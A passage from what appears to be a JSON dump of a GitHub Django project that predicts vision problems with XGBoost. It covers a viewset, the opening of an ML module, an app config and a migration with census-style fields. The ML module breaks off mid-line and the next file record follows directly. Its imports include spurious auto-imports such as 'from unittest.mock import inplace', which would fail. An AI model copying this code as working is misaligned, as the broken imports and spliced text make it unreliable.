disabledperson.models import Disabledperson\r\nfrom disabledperson.myserializer import DisabledpersonSerializer\r\nfrom disabledperson import disabledpersonML\r\nfrom rest_framework.response import Response\r\n\r\n\r\nclass DisabledpersonViewSet(viewsets.ModelViewSet):\r\n queryset = Disabledperson.objects.all()\r\n serializer_class = DisabledpersonSerializer\r\n def create(self, request, *args, **kwargs):\r\n viewsets.ModelViewSet.create(self, request, *args, **kwargs)\r\n ob = Disabledperson.objects.last()\r\n vision_problem = disabledpersonML.pred(ob)\r\n return Response({\"Status\": \"Vision Problem\", \"Vision problem\": vision_problem, 'temp':args})\r\n" }, { "alpha_fraction": 0.5216768383979797, "alphanum_fraction": 0.5335005521774292, "avg_line_length": 32.48147964477539, "blob_id": "1d4a5977d0fb6125b8b55bfab834eb37e5a107a8", "content_id": "23e76ce9b9684ae04caa61a846350942d806c9cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2791, "license_type": "no_license", "max_line_length": 128, "num_lines": 81, "path": "/ElderlyProject/disabledperson/disabledpersonML.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\n# from sklearn.metrics import train_test_split\r\nfrom xgboost import XGBClassifier\r\nfrom unittest.mock import inplace\r\nfrom pyexpat import model\r\nfrom _ast import Try, With\r\nfrom copyreg import pickle\r\nimport pickle\r\nimport os\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n\r\ndef pre_process(df):\r\n print(\"--------------------------Inside pre process 
{ "alpha_fraction": 0.7244898080825806, "alphanum_fraction": 0.7244898080825806, "avg_line_length": 17.600000381469727, "blob_id": "7f25646d01defad1c8dc619d51b76da50984e2ee", "content_id": "60e563969ebc4e5d105a28826cd3b05a25ebbd30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/ElderlyProject/oldperson/apps.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\r\n\r\n\r\nclass OldpersonConfig(AppConfig):\r\n    name = 'oldperson'\r\n" },
{ "alpha_fraction": 0.49451887607574463, "alphanum_fraction": 0.5347137451171875, "avg_line_length": 29.576923370361328, "blob_id": "5855a5feb52a5806df082033172095af3fd5d8f4", "content_id": "669a31773434900c2d76662d1a5faec45fdb15b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 821, "license_type": "no_license", "max_line_length": 114, "num_lines": 26, "path": "/ElderlyProject/oldperson/migrations/0001_initial.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.7 on 2019-11-07 12:56\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n    initial = True\r\n\r\n    dependencies = [\r\n    ]\r\n\r\n    operations = [\r\n        migrations.CreateModel(\r\n            name='Oldperson',\r\n            fields=[\r\n                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n                ('SERIALNO', models.CharField(max_length=100)),\r\n                ('SPORDER', models.CharField(max_length=100)),\r\n                ('PUMA', models.CharField(max_length=100)),\r\n                ('ST', models.CharField(max_length=100)),\r\n                ('PWGTP', models.CharField(max_length=100)),\r\n                ('AGEP', models.CharField(max_length=100)),\r\n            ],\r\n        ),\r\n    ]\r\n" } ]
16